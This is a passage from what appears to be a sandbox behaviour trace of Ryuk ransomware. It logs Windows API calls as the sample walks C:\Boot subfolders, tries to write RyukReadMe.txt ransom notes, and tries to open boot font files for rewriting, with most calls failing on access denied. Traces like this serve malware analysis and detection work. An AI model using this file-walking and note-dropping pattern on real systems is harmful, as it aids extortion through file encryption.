GetLastError () returned 0x5 [0160.973] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.973] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.973] SetLastError (dwErrCode=0x0) [0160.973] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.973] GetLastError () returned 0x5 [0160.973] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.973] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.974] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.974] SetLastError (dwErrCode=0x0) [0160.974] CreateFileW (lpFileName="C:\\Boot\\en-US\\RyukReadMe.txt" (normalized: "c:\\boot\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.974] GetLastError () returned 0x5 [0160.974] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.974] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.974] SetLastError (dwErrCode=0x0) [0160.974] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.974] GetLastError () returned 0x5 [0160.974] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.974] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.974] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.974] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.974] SetLastError (dwErrCode=0x0) [0160.974] CreateFileW (lpFileName="C:\\Boot\\es-ES\\RyukReadMe.txt" (normalized: "c:\\boot\\es-es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.975] GetLastError () returned 0x5 [0160.975] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.975] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.975] SetLastError (dwErrCode=0x0) [0160.975] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.975] GetLastError () returned 0x5 [0160.975] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.975] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.975] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.975] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.975] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.975] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.975] SetLastError (dwErrCode=0x0) [0160.975] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\RyukReadMe.txt" (normalized: "c:\\boot\\fi-fi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.975] GetLastError () returned 0x5 [0160.975] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.975] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.975] SetLastError (dwErrCode=0x0) [0160.976] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.976] GetLastError () returned 0x5 [0160.976] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.976] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.976] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.976] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.976] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.976] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0 [0160.976] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.976] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.977] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.977] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0 [0160.977] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.977] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.977] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.977] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0 [0160.977] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.978] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.978] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.978] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0 [0160.978] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.978] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.978] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.979] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0 [0160.979] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.979] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.979] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.979] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.979] SetLastError (dwErrCode=0x0) [0160.979] CreateFileW (lpFileName="C:\\Boot\\Fonts\\RyukReadMe.txt" (normalized: "c:\\boot\\fonts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.979] GetLastError () returned 0x5 [0160.979] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.979] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.979] SetLastError (dwErrCode=0x0) [0160.979] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.979] GetLastError () returned 0x5 [0160.979] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.979] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.980] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.980] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.980] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.980] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.980] SetLastError (dwErrCode=0x0) [0160.980] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\RyukReadMe.txt" (normalized: "c:\\boot\\fr-fr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.980] GetLastError () returned 0x5 [0160.980] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.980] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.980] SetLastError (dwErrCode=0x0) [0160.980] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.980] GetLastError () returned 0x5 [0160.980] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.980] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.980] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.981] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.981] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.981] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.981] SetLastError (dwErrCode=0x0) [0160.981] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\RyukReadMe.txt" (normalized: "c:\\boot\\hu-hu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.981] GetLastError () returned 0x5 [0160.981] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.981] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.981] SetLastError (dwErrCode=0x0) [0160.981] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.981] GetLastError () returned 0x5 [0160.981] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.981] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.981] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.981] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.981] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.981] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.981] SetLastError (dwErrCode=0x0) [0160.982] CreateFileW (lpFileName="C:\\Boot\\it-IT\\RyukReadMe.txt" (normalized: "c:\\boot\\it-it\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.982] GetLastError () returned 0x5 [0160.982] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.982] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.982] SetLastError (dwErrCode=0x0) [0160.982] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.982] GetLastError () returned 0x5 [0160.982] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.982] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.982] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.982] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.982] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.982] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.982] SetLastError (dwErrCode=0x0) [0160.982] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\RyukReadMe.txt" (normalized: "c:\\boot\\ja-jp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.983] GetLastError () returned 0x5 [0160.983] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.983] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.983] SetLastError (dwErrCode=0x0) [0160.983] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.983] GetLastError () returned 0x5 [0160.983] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.983] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.983] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.983] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.983] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.983] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.983] SetLastError (dwErrCode=0x0) [0160.983] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\RyukReadMe.txt" (normalized: "c:\\boot\\ko-kr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.983] GetLastError () returned 0x5 [0160.983] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.983] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.984] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.984] SetLastError (dwErrCode=0x0) [0160.984] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.984] GetLastError () returned 0x5 [0160.984] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.984] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.984] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.984] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.984] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.984] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.984] SetLastError (dwErrCode=0x0) [0160.984] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\RyukReadMe.txt" (normalized: "c:\\boot\\nb-no\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.984] GetLastError () returned 0x5 [0160.984] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.984] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.984] SetLastError (dwErrCode=0x0) [0160.984] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.984] GetLastError () returned 0x5 [0160.985] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.985] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.985] 